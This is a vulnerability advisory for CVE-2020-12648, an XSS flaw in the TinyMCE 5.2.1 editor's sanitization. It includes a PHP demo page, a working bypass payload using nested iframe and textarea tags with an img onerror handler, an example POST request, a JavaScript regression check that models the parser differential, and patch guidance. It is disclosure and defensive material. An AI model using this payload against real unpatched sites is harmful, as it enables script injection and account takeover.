TinyMCE — Version 5.2.1

ADVISORY SUMMARY

The following document describes an identified vulnerability in the TinyMCE application in version 5.2.1. TinyMCE is in use on thousands of websites, but the risk and impact of this vulnerability on those sites depend on the details of the application in which TinyMCE is used. The use of "classic" editing mode, existing XSS protections, and whether users can control the initial content inside the editor all affect the exploitability of this vulnerability.

Impact

Applications that use the TinyMCE text editor and do not implement additional XSS protections such as a strict content security policy (CSP) may be vulnerable to XSS. The exploitability and impact of this vulnerability are specific to the deployed application, but could result in sensitive information disclosure, privilege escalation, and account takeover.

Risk Level

High

Affected Vendor

Product Vendor: Tiny Technologies, Inc.
Product Name: TinyMCE
Affected Version: 5.2.1 and earlier


Product Description

TinyMCE is a What-You-See-Is-What-You-Get (WYSIWYG) HTML text editor and JavaScript library. It is typically included in third-party websites to provide text editing functionality, including editing of HTML content. The project's official website is tiny.cloud. The latest versions of the application are 4.9.11, released on July 13, 2020, and 5.4.1, released on July 8, 2020.

Vulnerabilities List:

One vulnerability was identified within the TinyMCE application:

CROSS-SITE SCRIPTING

Solution

Update to version 4.9.11 or 5.4.1.


This vulnerability is described in the section below.

VULNERABILITIES


CROSS-SITE SCRIPTING

TinyMCE is affected by a vulnerability in its stripping and sanitization logic, which allows an attacker to bypass these built-in cross-site scripting (XSS) protections and execute arbitrary JavaScript code. The code executes within the context of the application that loaded TinyMCE. This vulnerability can be mitigated with holistic XSS protections in the application, such as a strict content security policy (CSP), or by updating TinyMCE to version 4.9.11 or 5.4.1.

CVE ID: CVE-2020-12648
Security Risk: High
Impact: Escalation of privileges, Information Disclosure, Other (context-dependent)
Access Vector: Remote

An XSS vulnerability is present in TinyMCE version 5.2.1. When TinyMCE is deployed in classic editing mode, its stripping and sanitization logic can be bypassed using nested and non-terminated HTML tags, which allows an attacker to inject an <img> tag with arbitrary src and onerror values, resulting in XSS.

To demonstrate the vulnerability, an HTML page was created with an instance of the TinyMCE editor, based on the official TinyMCE Quick Start Guide, as shown below:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <!-- TinyMCE 5 loaded from the vendor CDN; no API key is needed for a local test -->
  <script src="https://cdn.tiny.cloud/1/no-api-key/tinymce/5/tinymce.min.js" referrerpolicy="origin"></script>
  <script>
    // Attach the editor to every textarea on the page; classic (iframe) editing mode is the default
    tinymce.init({
      mode: "textareas"
    });
  </script>
</head>
<body>
<h1>TinyMCE Quick Start Guide</h1>
  <form method="post">
    <textarea name="mytextarea" id="mytextarea">
         <?php
           // Reflect the posted content as the editor's initial content. The browser decodes
           // HTML-encoded text inside a <textarea> before TinyMCE reads and parses it.
           echo htmlspecialchars($_POST['mytextarea'] ?? '');
         ?>
    </textarea>
    <input type="submit" value="submit">
  </form>
</body>
</html>


This example used PHP to supply user-controlled content to TinyMCE for rendering on page load. The payload could also be supplied directly through the TinyMCE setContent and insertContent functions.

XSS was achieved using the following payload as user-supplied content:

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">


An example request is shown below:

POST /tinymce.php HTTP/1.1
Host: localhost:8000
…omitted for brevity…

mytextarea=<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">


After the page loaded, the payload executed:

[Screenshot: payload executed]


This vulnerability was also discovered in TinyMCE version 4.0.26. The impact of this vulnerability depends on the details of the application in which TinyMCE is used.
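As an added illustration (not code from this advisory or from TinyMCE), the JavaScript below contrasts a browser-faithful tokenizer with a hypothetical sanitizer whose only blind spot is treating <iframe> as an ordinary container rather than a raw-text element. That blind spot is an assumption chosen to show the parser-differential class the advisory's payload belongs to, not a description of TinyMCE's internal parser; used as a regression check, it flags content where the browser will materialise an event handler that the sanitizer never saw as an attribute.

```javascript
// Added example (not TinyMCE's code): two tokenizers that differ only in
// which elements they treat as raw text, i.e. literal text until the matching
// end tag, as the HTML spec does for <iframe> and <textarea>. The browser
// list is real; the "sanitizer" list with <iframe> removed is an assumed
// blind spot used to show the parser-differential shape of the bypass.
const BROWSER_RAW_TEXT = new Set(['iframe', 'textarea', 'script', 'style',
  'title', 'xmp', 'noembed', 'noframes']);
const NAIVE_RAW_TEXT = new Set([...BROWSER_RAW_TEXT].filter(t => t !== 'iframe'));

// Matches start and end tags: <name attrs> and </name>.
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9-]*)([^>]*?)\/?>/g;

// Start tags a tokenizer using rawTextSet would emit as real elements,
// together with any on* event-handler attributes found on them.
function liveStartTags(html, rawTextSet) {
  const tags = [];
  let rawOpen = null; // raw-text element we are currently inside, if any
  const re = new RegExp(TAG_RE.source, 'g');
  let m;
  while ((m = re.exec(html)) !== null) {
    const isEnd = m[1] === '/';
    const name = m[2].toLowerCase();
    if (rawOpen !== null) {
      // Inside raw text only the matching end tag is markup; everything
      // else (including other tags) is plain character data.
      if (isEnd && name === rawOpen) rawOpen = null;
      continue;
    }
    if (isEnd) continue;
    const handlers = (m[3].match(/\bon[a-z]+(?=\s*=)/gi) || []).map(h => h.toLowerCase());
    tags.push({ name, handlers });
    if (rawTextSet.has(name)) rawOpen = name;
  }
  return tags;
}

// Regression check: report handlers the browser will wire up that the
// sanitizer's tokenizer never saw as an attribute.
function parserDifferential(html) {
  const withHandlers = tags => tags
    .filter(t => t.handlers.length > 0)
    .map(t => `${t.name}[${t.handlers.join(',')}]`);
  const browser = withHandlers(liveStartTags(html, BROWSER_RAW_TEXT));
  const sanitizer = withHandlers(liveStartTags(html, NAIVE_RAW_TEXT));
  const hidden = browser.filter(x => !sanitizer.includes(x));
  return { browser, sanitizer, hidden, bypass: hidden.length > 0 };
}

// The advisory's payload: the sanitizer sees no <img> element at all, the browser does.
console.log(parserDifferential(
  '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">'));
```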

Patch Details

The patched versions are 4.9.11 and 5.4.1.


Credits

Timeline